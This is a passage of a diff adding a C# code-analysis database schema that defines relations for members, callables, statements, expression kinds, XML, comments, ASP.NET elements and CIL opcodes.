ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event | @operator; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | @sizeof_expr + | @pointer_indirection_expr | @address_of_expr; + +@anonymous_function_expr = @lambda_expr | @anonymous_method_expr; + +@call = @method_invocation_expr | @constructor_init_expr | @operator_invocation_expr + | @delegate_invocation_expr | @object_creation_expr | @call_access_expr + | @local_function_invocation_expr | @function_pointer_invocation_expr; + +@call_access_expr = @property_access_expr | @event_access_expr | @indexer_access_expr; + +@late_bindable_expr = @dynamic_element_access_expr | @dynamic_member_access_expr + | @object_creation_expr | @method_invocation_expr | @operator_invocation_expr; + +@throw_element = @throw_expr | @throw_stmt; + +@implicitly_typeable_object_creation_expr = @object_creation_expr | @explicit_delegate_creation_expr; + +implicitly_typed_array_creation( + unique int id: @array_creation_expr ref); + +explicitly_sized_array_creation( + unique int id: @array_creation_expr ref); + +stackalloc_array_creation( + unique int id: @array_creation_expr ref); + +implicitly_typed_object_creation( + unique int id: @implicitly_typeable_object_creation_expr ref); + +mutator_invocation_mode( + unique int id: @operator_invocation_expr ref, + int mode: int ref /* prefix = 1, postfix = 2*/); + +expr_compiler_generated( + unique int id: @expr ref); + +expr_value( + unique int id: @expr ref, + string value: string ref); + +expr_call( + unique int caller_id: @expr ref, + int target_id: @callable ref); + +expr_access( + unique int accesser_id: @access_expr ref, + int target_id: @accessible ref); + +@accessible = @method | @assignable | @local_function | @namespace; + +expr_location( + unique int id: @expr ref, + int loc: @location ref); + +dynamic_member_name( + unique int id: @late_bindable_expr ref, + string name: string ref); + +@qualifiable_expr = @member_access_expr + | @method_invocation_expr + | @element_access_expr; + +conditional_access( + unique int id: @qualifiable_expr ref); + +expr_argument( + unique int id: @expr ref, + int mode: int ref); + /* mode is the same as params: value = 0, ref = 1, out = 2 */ + +expr_argument_name( + unique int id: @expr ref, + string name: string ref); + +lambda_expr_return_type( + unique int id: @lambda_expr ref, + int type_id: @type_or_ref ref); + +/** CONTROL/DATA FLOW **/ + +@control_flow_element = @stmt | @expr; + +/* XML Files */ + +xmlEncoding ( + unique int id: @file ref, + string encoding: string ref); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/* Comments */ + +commentline( + unique int id: @commentline, + int kind: int ref, + string text: string ref, + string rawtext: string ref); + +case @commentline.kind of + 0 = @singlelinecomment +| 1 = @xmldoccomment +| 2 = @multilinecomment; + +commentline_location( + unique int id: @commentline ref, + int loc: @location ref); + +commentblock( + unique int id : @commentblock); + +commentblock_location( + unique int id: @commentblock ref, + int loc: @location ref); + +commentblock_binding( + int id: @commentblock ref, + int entity: @element ref, + int bindtype: int ref); /* 0: Parent, 1: Best, 2: Before, 3: After */ + +commentblock_child( + int id: @commentblock ref, + int commentline: @commentline ref, + int index: int ref); + +/* ASP.NET */ + +case @asp_element.kind of + 0=@asp_close_tag +| 1=@asp_code +| 2=@asp_comment +| 3=@asp_data_binding +| 4=@asp_directive +| 5=@asp_open_tag +| 6=@asp_quoted_string +| 7=@asp_text +| 8=@asp_xml_directive; + +@asp_attribute = @asp_code | @asp_data_binding | @asp_quoted_string; + +asp_elements( + unique int id: @asp_element, + int kind: int ref, + int loc: @location ref); + +asp_comment_server(unique int comment: @asp_comment ref); +asp_code_inline(unique int code: @asp_code ref); +asp_directive_attribute( + int directive: @asp_directive ref, + int index: int ref, + string name: string ref, + int value: @asp_quoted_string ref); +asp_directive_name( + unique int directive: @asp_directive ref, + string name: string ref); +asp_element_body( + unique int element: @asp_element ref, + string body: string ref); +asp_tag_attribute( + int tag: @asp_open_tag ref, + int index: int ref, + string name: string ref, + int attribute: @asp_attribute ref); +asp_tag_name( + unique int tag: @asp_open_tag ref, + string name: string ref); +asp_tag_isempty(int tag: @asp_open_tag ref); + +/* Common Intermediate Language - CIL */ + +case @cil_instruction.opcode of + 0 = @cil_nop +| 1 = @cil_break +| 2 = @cil_ldarg_0 +| 3 = @cil_ldarg_1 +| 4 = @cil_ldarg_2 +| 5 = @cil_ldarg_3 +| 6 = @cil_ldloc_0 +| 7 = @cil_ldloc_1 +| 8 = @cil_ldloc_2 +| 9 = @cil_ldloc_3 +| 10 = @cil_stloc_0 +| 11 = @cil_stloc_1 +| 12 = @cil_stloc_2 +| 13 = @cil_stloc_3 +| 14 = @cil_ldarg_s +| 15 = @cil_ldarga_s +| 16 = @cil_starg_s +| 17 = @cil_ldloc_s +| 18 = @cil_ldloca_s +| 19 = @cil_stloc_s +| 20 = @cil_ldnull +| 21 = @cil_ldc_i4_m1 +| 22 = @cil_ldc_i4_0 +| 23 = @cil_ldc_i4_1 +| 24 = @cil_ldc_i4_2 +| 25 = @cil_ldc_i4_3 +| 26 = @cil_ldc_i4_4 +| 27 = @cil_ldc_i4_5 +| 28 = @cil_ldc_i4_6 +| 29 = @cil_ldc_i4_7 +| 30 = @cil_ldc_i4_8 +| 31 = @cil_ldc_i4_s +| 32 = @cil_ldc_i4 +| 33 = @cil_ldc_i8 +| 34 = @cil_ldc_r4 +| 35 = @cil_ldc_r8 +| 37 = @cil_dup +| 38 = @cil_pop +| 39 = @cil_jmp +| 40 = @cil_call +| 41 = @cil_calli +| 42 = @cil_ret +| 43 = @cil_br_s +| 44 = @cil_brfalse_s +| 45 = @cil_brtrue_s +| 46 = @cil_beq_s +| 47 = @cil_bge_s +| 48 = @cil_bgt_s +| 49 = @cil_ble_s +| 50 = @cil_blt_s +| 51 = @cil_bne_un_s +| 52 = @cil_bge_un_s +| 53 = @cil_bgt_un_s +| 54 = @cil_ble_un_s +| 55 = @cil_blt_un_s +| 56 = @cil_br +| 57 = @cil_brfalse +| 58 = @cil_brtrue +| 59 = @cil_beq +| 60 = @cil_bge +| 61 = @cil_bgt +| 62 = @cil_ble +| 63 = @cil_blt +| 64 = @cil_bne_un +| 65 = @cil_bge_un +| 66 = @cil_bgt_un +| 67 = @cil_ble_un +| 68 = @cil_blt_un +| 69 = @cil_switch +| 70 = @cil_ldind_i1 +| 71 = @cil_ldind_u1 +| 72 = @cil_ldind_i2 +| 73 = @cil_ldind_u2 +| 74 = @cil_ldind_i4 +| 75 = @cil_ldind_u4 +| 76 = @cil_ldind_i8 +| 77 = @cil_ldind_i +| 78 = @cil_ldind_r4 +| 79 = @cil_ldind_r8 +| 80 = @cil_ldind_ref +| 81 = @cil_stind_ref +| 82 = @cil_stind_i1 +| 83 = @cil_stind_i2 +| 84 = @cil_stind_i4 +| 85 = @cil_stind_i8 +| 86 = @cil_stind_r4 +| 87 = @cil_stind_r8 +| 88 = @cil_add +| 89 = @cil_sub +| 90 = @cil_mul +| 91 = @cil_div +| 92 = @cil_div_un +| 93 = @cil_rem +| 94 = @cil_rem_un +| 95 = @cil_and +| 96 = @cil_or +| 97 = @cil_xor +| 98 = @cil_shl +| 99 = @cil_shr +| 100 = @cil_shr_un +| 101 = @cil_neg +| 102 = @cil_not +| 103 = @cil_conv_i1 +| 104 = @cil_conv_i2 +| 105 = @cil_conv_i4 +| 106 = @cil_conv_i8 +| 107 = @cil_conv_r4 +| 108 = @cil_conv_r8 +| 109 = @cil_conv_u4 +| 110 = @cil_conv_u8 +| 111 = @cil_callvirt +| 112 = @cil_cpobj +| 113 = @cil_ldobj +| 114 = @cil_ldstr +| 115 = @cil_newobj +| 116 = @cil_castclass +| 117 = @cil_isinst +| 118 = @cil_conv_r_un +| 121 = @cil_unbox +| 122 = @cil_throw +| 123 = @cil_ldfld +| 124 = @cil_ldflda +| 125 = @cil_stfld +| 126 = @cil_ldsfld +| 127 = @cil_ldsflda +| 128 = @cil_stsfld +| 129 = @cil_stobj +| 130 = @cil_conv_ovf_i1_un +| 131 = @cil_conv_ovf_i2_un +| 132 = @cil_conv_ovf_i4_un +| 133 = @cil_conv_ovf_i8_un +| 134 = @cil_conv_ovf_u1_un +| 135 = @cil_conv_ovf_u2_un +| 136 = @cil_conv_ovf_u4_un +| 137 = @cil_conv_ovf_u8_un +| 138 = @cil_conv_ovf_i_un +| 139 = @cil_conv_ovf_u_un +| 140 = @cil_box +| 141 = @cil_newarr +| 142 = @cil_ldlen +| 143 = @cil_ldelema +| 144 = @cil_ldelem_i1 +| 145 = @cil_ldelem_u1 +| 146 = @cil_ldelem_i2 +| 147 = @cil_ldelem_u2 +| 148 = @cil_ldelem_i4 +| 149 = @cil_ldelem_u4 +| 150 = @cil_ldelem_i8 +| 151 = @cil_ldelem_i +| 152 = @cil_ldelem_r4 +| 153 = @cil_ldelem_r8 +| 154 = @cil_ldelem_ref +| 155 = @cil_stelem_i +| 156 = @cil_stelem_i1 +| 157 = @cil_stelem_i2 +| 158 = @cil_stelem_i4 +| 159 = @cil_stelem_i8 +| 160 = @cil_stelem_r4 +| 161 = @cil_stelem_r8 +| 162 = @cil_stelem_ref +| 163 = @cil_ldelem +| 164 = @cil_stelem +| 165 = @cil_unbox_any +| 179 = @cil_conv_ovf_i1 +| 180 = @cil_conv_ovf_u1 +| 181 = @cil_conv_ovf_i2 +| 182 = @cil_conv_ovf_u2 +| 183 = @cil_conv_ovf_i4 +| 184 = @cil_conv_ovf_u4 +| 185 = @cil_conv_ovf_i8 +| 186 = @cil_conv_ovf_u8 +| 194 = @cil_refanyval +| 195 = @cil_ckinfinite +| 198 = @cil_mkrefany +| 208 = @cil_ldtoken +| 209 = @cil_conv_u2 +| 210 = @cil_conv_u1 +| 211 = @cil_conv_i +| 212 = @cil_conv_ovf_i +| 213 = @cil_conv_ovf_u +| 214 = @cil_add_ovf +| 215 = @cil_add_ovf_un +| 216 = @cil_mul_ovf +| 217 = @cil_mul_ovf_un +| 218 = @cil_sub_ovf +| 219 = @cil_sub_ovf_un +| 220 = @cil_endfinally +| 221 = @cil_leave +| 222 = @cil_leave_s +| 223 = @cil_stind_i +| 224 = @cil_conv_u +| 65024 = @cil_arglist +| 65025 = @cil_ceq +| 65026 = @cil_cgt +| 65027 = @cil_cgt_un +| 65028 = @cil_clt +| 65029 = @cil_clt_un +| 65030 = @cil_ldftn +| 65031 = @cil_ldvirtftn +| 65033 = @cil_ldarg +| 65034 = @cil_ldarga +| 65035 = @cil_starg +| 65036 = @cil_ldloc +| 65037 = @cil_ldloca +| 65038 = @cil_stloc +| 65039 = @cil_localloc +| 65041 = @cil_endfilter +| 65042 = @cil_unaligned +| 65043 = @cil_volatile +| 65044 = @cil_tail +| 65045 = @cil_initobj +| 65046 = @cil_constrained +| 65047 = @cil_cpblk +| 65048 = @cil_initblk +| 65050 = @cil_rethrow +| 65052 = @cil_sizeof +| 65053 = @cil_refanytype +| 65054 = @cil_readonly +; + +// CIL ignored instructions + +@cil_ignore = @cil_nop | @cil_break | @cil_volatile | @cil_unaligned; + +// CIL local/parameter/field access + +@cil_ldarg_any = @cil_ldarg_0 | @cil_ldarg_1 | @cil_ldarg_2 | @cil_ldarg_3 | @cil_ldarg_s | @cil_ldarga_s | @cil_ldarg | @cil_ldarga; +@cil_starg_any = @cil_starg | @cil_starg_s; + +@cil_ldloc_any = @cil_ldloc_0 | @cil_ldloc_1 | @cil_ldloc_2 | @cil_ldloc_3 | @cil_ldloc_s | @cil_ldloca_s | @cil_ldloc | @cil_ldloca; +@cil_stloc_any = @cil_stloc_0 | @cil_stloc_1 | @cil_stloc_2 | @cil_stloc_3 | @cil_stloc_s | @cil_stloc; + +@cil_ldfld_any = @cil_ldfld | @cil_ldsfld | @cil_ldsflda | @cil_ldflda; +@cil_stfld_any = @cil_stfld | @cil_stsfld; + +@cil_local_access = @cil_stloc_any | @cil_ldloc_any; +@cil_arg_access = @cil_starg_any | @cil_ldarg_any; +@cil_read_access = @cil_ldloc_any | @cil_ldarg_any | @cil_ldfld_any; +@cil_write_access = @cil_stloc_any | @cil_starg_any | @cil_stfld_any; + +@cil_stack_access = @cil_local_access | @cil_arg_access; +@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any 